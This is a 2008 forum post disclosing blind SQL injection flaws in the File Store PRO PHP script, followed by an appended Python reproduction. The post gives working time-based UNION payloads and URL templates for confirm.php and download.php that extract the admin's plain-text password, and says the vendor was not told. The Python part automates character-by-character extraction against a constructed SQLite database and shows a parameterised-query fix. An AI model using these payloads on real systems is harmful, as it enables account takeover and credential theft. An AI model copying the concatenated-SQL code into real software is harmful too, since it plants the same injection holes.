vladiii Posted July 8, 2008

- Requires admin rights.

In /confirm.php:

    $SQL="SELECT `".DB_PREFIX."users`.*, `".DB_PREFIX."file_list`.`filename`, `".DB_PREFIX."file_list`.`descript` ";
    $SQL.=" FROM `".DB_PREFIX."file_list` LEFT JOIN `".DB_PREFIX."users` ON `".DB_PREFIX."file_list`.`user_id`=`".DB_PREFIX."users`.`id`";
    $SQL.=" WHERE `".DB_PREFIX."file_list`.`id`='".$id."'";
    if(!$mysql->query($SQL)){ exit($mysql->error);}
    if($mysql->num<=0){ exit("Record not found");}

Higher up in the code we have:

    if(isset($_GET["folder"]) && $_GET["folder"]!="") { $folder=$_GET["folder"];} else { exit("Bad Request"); }
    if(isset($_GET["id"]) && $_GET["id"]!="") { $id=$_GET["id"];} else { exit("Bad Request"); }
    // Validate all inputs
    // Added by SepedaTua on June 01, 2006 - http://www.sepedatua.info/
    /********************** SepedaTua ****************************/
    /* Fields:
    $folder
    $id
    */
    $search = array ('@<script[^>]*?>.*?</script>@si', '@<[\/\!]*?[^<>]*?>@si', '@([\r\n])[\s]+@', '@&(quot|#34);@i', '@&(amp|#38);@i', '@&(lt|#60);@i', '@&(gt|#62);@i', '@&(nbsp|#160);@i', '@&(iexcl|#161);@i', '@&(cent|#162);@i', '@&(pound|#163);@i', '@&(copy|#169);@i', '@(\d+);@e');
    $replace = array ('', '', '\1', '"', '&', '<', '>', ' ', chr(161), chr(162), chr(163), chr(169), 'chr(\1)');
    $ffolder = $folder;
    $fid = $id;
    $folder = preg_replace($search, $replace, $folder);
    $id = preg_replace($search, $replace, $id);

So the filtering is worth nothing...
Leaving that aside, let's look at the users table:

    Create table fstore_users (
      id Integer(11) NOT NULL AUTO_INCREMENT,
      real_name Varchar(128),
      company Varchar(128),
      address1 Varchar(128),
      address2 Varchar(128),
      city Varchar(128),
      state Varchar(128),
      postcode Varchar(128),
      country Varchar(128),
      telephone Varchar(128),
      login Varchar(64),
      password Varchar(64),
      email Varchar(128),
      level Integer(11),
      confirm Char(1) DEFAULT 'N',
      allow_upload Char(1) DEFAULT 'N',
      subscription char(1) default 'N',
      Primary Key (id)
    );

In the SQL syntax we will have 19 columns: * = 17 + 1 + 1.

The syntax will be:

    ' UNION SELECT IF (SUBSTRING(password, 1, 1)='a', BENCHMARK(100000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from fstore_users where login='admin

    http://site.xxx/confirm.php?folder=a&id=[SQL]

The nice part is that the passwords are kept as plain text in the database. You can download the software* from here (the trial version; the "full" one costs $60):

    http://webscripts.softpedia.com/script/File-Management-Perl/-1-File-Store-PRO-45963.html

*It came out a few days ago; it is new.

Requires magic_quotes_gpc = off. I have not contacted the person who maintains this script. I have not sent it to milw0rm either.

- Does not require admin rights.

In /download.php:

    if(!isset($_GET["sig"])) // direct download, no need to login
    $MustLogin=1|2|4;
    require_once("libs/header.php");
    if(!isset($_GET["sig"])) // direct download, no need to login
    $userlevel=$CurUser->getlevel();
    $SQL="SELECT * FROM `".DB_PREFIX."file_list` WHERE `id`='".$fileid."'";
    if(!$mysql->query($SQL)){ exit($mysql->error);}

$fileid is taken from $_GET and the same filtering is applied to it. The syntax:

    ' UNION SELECT IF (SUBSTRING(password, 1, 1)='b', BENCHMARK(100000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8,9,10,11 from fstore_users where login='admin

    http://site.xxx/download.php?id=[SQL]

Good luck!

P.S. The script is full of blind SQL injection!
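The confirm.php injection reproduced offline, as an added example that is not part of the original post and is not File Store PRO code. It ports the SepedaTua preg_replace() list and the concatenated query from the post to Python, runs them against an in-memory SQLite database that stands in for MySQL (a constructed fstore_users row with a plain-text password, and a small fstore_file_list so that users.* + filename + descript still gives 19 columns), and goes beyond the single probe in the post by automating the whole per-character timing loop. Because SQLite has no IF(), BENCHMARK() or ENCODE(), the payload is written with CASE WHEN ... END and a registered BENCHMARK() that just sleeps; SUBSTRING is written as SUBSTR, which both engines accept. The sleep length, threshold, character set and the password 's3cret' are all assumptions of this example. The last function shows the fix: bind the id instead of splicing it into the SQL text.

```python
"""
Time-based blind SQL injection through confirm.php's `id` parameter,
reproduced offline against SQLite (constructed data, not the real product).
"""
import re
import sqlite3
import string
import time

DB_PREFIX = "fstore_"
SLEEP_SECONDS = 0.05            # how long the fake BENCHMARK() burns (assumption)
THRESHOLD = SLEEP_SECONDS / 2   # attacker's "that took too long" cutoff

# SepedaTua's "Validate all inputs" list, ported rule by rule from the post.
# Not one pattern touches a single quote or an SQL keyword.
_RULES = [
    (re.compile(r"<script[^>]*?>.*?</script>", re.S | re.I), ""),
    (re.compile(r"<[\/\!]*?[^<>]*?>", re.S | re.I), ""),
    (re.compile(r"([\r\n])[\s]+"), r"\1"),
    (re.compile(r"&(quot|#34);", re.I), '"'),
    (re.compile(r"&(amp|#38);", re.I), "&"),
    (re.compile(r"&(lt|#60);", re.I), "<"),
    (re.compile(r"&(gt|#62);", re.I), ">"),
    (re.compile(r"&(nbsp|#160);", re.I), " "),
    (re.compile(r"&(iexcl|#161);", re.I), chr(161)),
    (re.compile(r"&(cent|#162);", re.I), chr(162)),
    (re.compile(r"&(pound|#163);", re.I), chr(163)),
    (re.compile(r"&(copy|#169);", re.I), chr(169)),
    # PHP '@(\d+);@e' with 'chr(\1)': the /e modifier evaluates chr() on the digits
    (re.compile(r"(\d+);"), lambda m: chr(int(m.group(1)) % 256)),
]


def sepedatua_filter(value: str) -> str:
    """Apply the preg_replace() list from confirm.php to one request parameter."""
    for pattern, repl in _RULES:
        value = pattern.sub(repl, value)
    return value


def build_confirm_query(fid: str) -> str:
    """The query confirm.php concatenates for ?id=<fid> (after the filter)."""
    u, f = f"`{DB_PREFIX}users`", f"`{DB_PREFIX}file_list`"
    return (
        f"SELECT {u}.*, {f}.`filename`, {f}.`descript` "
        f"FROM {f} LEFT JOIN {u} ON {f}.`user_id`={u}.`id` "
        f"WHERE {f}.`id`='{sepedatua_filter(fid)}'"
    )


def _fake_benchmark(count, expr):
    """Stand-in for MySQL BENCHMARK(): ignore the arguments, burn time, return 0."""
    time.sleep(SLEEP_SECONDS)
    return 0


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the File Store PRO database (constructed rows)."""
    con = sqlite3.connect(":memory:")
    con.executescript(f"""
        CREATE TABLE {DB_PREFIX}users (
            id INTEGER PRIMARY KEY AUTOINCREMENT, real_name TEXT, company TEXT,
            address1 TEXT, address2 TEXT, city TEXT, state TEXT, postcode TEXT,
            country TEXT, telephone TEXT, login TEXT, password TEXT, email TEXT,
            level INTEGER, confirm TEXT DEFAULT 'N', allow_upload TEXT DEFAULT 'N',
            subscription TEXT DEFAULT 'N');
        CREATE TABLE {DB_PREFIX}file_list (
            id INTEGER PRIMARY KEY, user_id INTEGER, filename TEXT, descript TEXT);
        INSERT INTO {DB_PREFIX}users (login, password, email, level)
            VALUES ('admin', 's3cret', 'admin@site.xxx', 1);
        INSERT INTO {DB_PREFIX}file_list VALUES (1, 1, 'report.pdf', 'constructed row');
    """)
    con.create_function("BENCHMARK", 2, _fake_benchmark)
    return con


def serve_confirm(con: sqlite3.Connection, fid: str) -> float:
    """All the attacker gets back for confirm.php?folder=a&id=<fid>: the response
    time. The page body does not reveal which branch of the CASE ran."""
    t0 = time.perf_counter()
    con.execute(build_confirm_query(fid)).fetchall()
    return time.perf_counter() - t0


def payload(pos: int, ch: str, login: str = "admin") -> str:
    """The post's probe with IF() written as CASE so SQLite runs it; the 18 filler
    columns pad the UNION to the 19 columns of the original SELECT."""
    filler = ",".join(str(i) for i in range(2, 20))
    return (
        f"' UNION SELECT CASE WHEN SUBSTR(password,{pos},1)='{ch}' "
        f"THEN BENCHMARK(100000000,'x') ELSE 1 END,{filler} "
        f"FROM {DB_PREFIX}users WHERE login='{login}"
    )


def extract_password(con, login="admin",
                     charset=string.ascii_lowercase + string.digits, max_len=32):
    """Recover the plain-text password one position at a time from the delay."""
    found = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            if serve_confirm(con, payload(pos, ch, login)) > THRESHOLD:
                found += ch
                break
        else:  # no candidate slowed the server down: past the last character
            break
    return found


def confirm_query_safe(con, fid: str):
    """The fix: bind the value instead of splicing it into the SQL text."""
    u, f = f"`{DB_PREFIX}users`", f"`{DB_PREFIX}file_list`"
    sql = (f"SELECT {u}.*, {f}.`filename`, {f}.`descript` "
           f"FROM {f} LEFT JOIN {u} ON {f}.`user_id`={u}.`id` WHERE {f}.`id`=?")
    return con.execute(sql, (fid,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("filter keeps the quote:", repr(sepedatua_filter("' UNION SELECT ")))
    print("recovered:", extract_password(db))
    print("rows for the same payload, parameterised:", confirm_query_safe(db, payload(1, "s")))
```

Two things to keep in mind when reading it. The delay is only usable as a side channel because both MySQL's IF() and SQLite's CASE evaluate just the branch that is taken; the expensive call never runs for a wrong guess. And the loop stops at the first position where no candidate in the charset produces a delay, so a password containing characters outside the assumed set (upper case, symbols) comes back truncated; widen the charset before trusting the result.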